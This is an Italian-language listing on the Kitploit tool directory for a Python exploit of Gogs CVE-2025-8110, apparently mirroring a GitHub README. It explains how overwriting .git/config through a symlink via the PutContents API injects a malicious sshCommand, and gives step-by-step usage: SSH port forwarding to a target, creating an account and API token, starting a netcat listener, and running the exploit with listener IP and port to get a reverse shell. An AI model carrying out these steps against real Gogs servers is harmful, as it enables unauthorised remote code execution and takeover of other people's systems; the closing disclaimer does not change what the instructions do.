Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Strumenti/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Vedi Repository
135 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Gogs CVE-2025-8110 RCE Exploit

Un exploit automatico in Python per CVE-2025-8110 in Gogs. Questa vulnerabilità consente l'esecuzione di codice remoto (RCE) abusando dell'API PutContents, che non riesce a convalidare se un percorso di file è un symlink. Sovrascrivendo il file interno .git/config tramite un symlink, possiamo iniettare un sshCommand dannoso per attivare una reverse shell.

🛠️ Prerequisiti

Assicurati di avere Python 3 e le dipendenze necessarie installate:

root@kitploit:~
pip install requests rich beautifulsoup4

Devi anche avere git installato e raggiungibile nel tuo $PATH per la fase di clonazione e commit del repository.

⚙️ Configurazione e Impostazione

1. Accesso alla WebUI di Gogs

Gogs potrebbe essere in ascolto su 127.0.0.1:3001. Usa il port forwarding per accedere alla WebUI localmente:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Creazione dell'account

Una volta inoltrato, naviga su http://localhost:3001:

  • Crea un nuovo account.
  • Prendi nota del tuo Username e Password per lo script.

3. Generazione del Token API

Lo script utilizza l'API di Gogs per inviare il payload:

  1. Accedi alla WebUI.
  2. Vai su Impostazioni -> Applicazioni.
  3. Sotto Gestisci token di accesso personale, genera un nuovo token.
  4. Copia immediatamente il token.

🚀 Esecuzione

1. Avvia un listener Netcat

Avvia il listener prima di eseguire lo script, poiché la shell si attiva non appena l'aggiornamento API viene elaborato.

root@kitploit:~
nc -lvnp 5555

2. Esegui l'Exploit

Passa le tue credenziali e il token come argomenti:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

Argomenti

FlagDescrizione
-uL'URL di base dell'istanza Gogs (es. http://localhost:3001).
-unIl nome utente dell'account che hai creato.
-pwLa password dell'account che hai creato.
-tIl token API generato in Impostazioni.
-lhL'indirizzo IP del tuo listener (LHOST).
-lpLa porta del tuo listener (LPORT).

Nota: Se lo script si blocca o restituisce un Read timed out dopo "Overwriting .git/config", controlla il tuo listener. Questo di solito indica che la reverse shell si è connessa con successo e sta mantenendo la connessione.


Autore: TYehan

Disclaimer: Questo strumento è solo per scopi educativi e audit di sicurezza autorizzati. Usalo in modo responsabile.

Scarica lo strumento